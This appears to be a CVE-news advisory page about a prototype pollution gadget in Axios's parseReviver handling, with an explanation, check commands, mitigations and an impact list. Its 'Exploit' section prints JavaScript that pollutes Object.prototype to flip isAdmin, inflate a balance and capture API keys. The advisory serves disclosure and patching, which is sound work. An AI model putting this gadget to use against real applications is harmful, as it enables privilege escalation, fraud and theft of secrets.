Axios, Prototype Pollution Gadget, CVE-TBD (critical)

By /

Listen to this Post

How the CVE works (technical details)

The vulnerability resides in Axios’s default `transformResponse` function (line 124 of lib/defaults/index.js). This function calls JSON.parse(data, this.parseReviver), where `this` is the merged config object. Because `parseReviver` is not defined in Axios defaults, not validated by assertOptions, and not protected against prototype chain traversal, an attacker who can pollute `Object.prototype.parseReviver` (via any dependency like qs, lodash, etc.) injects a malicious reviver function. This reviver executes for every key–value pair in every JSON response processed by Axios. The attacker can read original values (exfiltrating API keys, tokens, PII) and surgically modify specific fields (e.g., isAdmin: false → true) while leaving the rest of the response intact. No constraints apply—the reviver may return any value, and the attack works silently inside the default transform, bypassing all existing prototype pollution mitigations (including those for `transformResponse` and `proxy` gadgets). All Axios versions from v0.x through v1.15.0 are affected.

dailycve form

Platform: Axios library
Version: All versions
Vulnerability: Prototype pollution gadget
Severity: Critical (9.1)
date: 2026-04-16

Prediction: Around May 2026

What Undercode Say:

Check if your Axios version is vulnerable
npm list axios
Simulate prototype pollution in Node.js
node -e "Object.prototype.parseReviver = (k,v) => k==='isAdmin'?true:v;"
Test with vulnerable Axios PoC (server + client)
curl -X GET http://localhost:3000/api/me
Mitigation: apply patch using hasOwnProperty
sed -i 's/JSON.parse(data, this.parseReviver)/const r = Object.prototype.hasOwnProperty.call(this, "parseReviver") ? this.parseReviver : undefined; JSON.parse(data, r)/' node_modules/axios/lib/defaults/index.js

Exploit:

// Attacker pollutes Object.prototype once
Object.prototype.parseReviver = function(key, value) {
if (key === 'isAdmin') return true; // privilege escalation
if (key === 'balance') return 999999; // financial fraud
if (key === 'apiKey') { // exfiltration
console.log('Stolen:', value);
return value; // keep response normal
}
return value;
};
// After pollution, every Axios JSON response is silently tampered
const axios = require('axios');
const response = await axios.get('/api/user'); // isAdmin becomes true

Protection from this CVE

  1. hasOwnProperty check – Use `Object.prototype.hasOwnProperty.call(this, ‘parseReviver’)` before passing reviver to JSON.parse.
  2. Null-prototype config – In mergeConfig.js, create merged config with `Object.create(null)` to block prototype traversal.
  3. Validate reviver – Ensure `this.parseReviver` is a function and an own property.

4. Temporary workaround – Freeze `Object.prototype`: `Object.freeze(Object.prototype)`.

  1. Update when patch released – Await official Axios fix (expected May 2026).

Impact

  • Authorization bypass – Viewer becomes admin, `isAdmin: false` → true.
  • Financial manipulation – Balance changed from 100 to 999999, transactions approved.
  • Silent data exfiltration – API keys, tokens, and PII stolen from every JSON response without errors.
  • Universal & invisible – Affects all JSON responses; no crash, no log anomaly, response structure intact.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top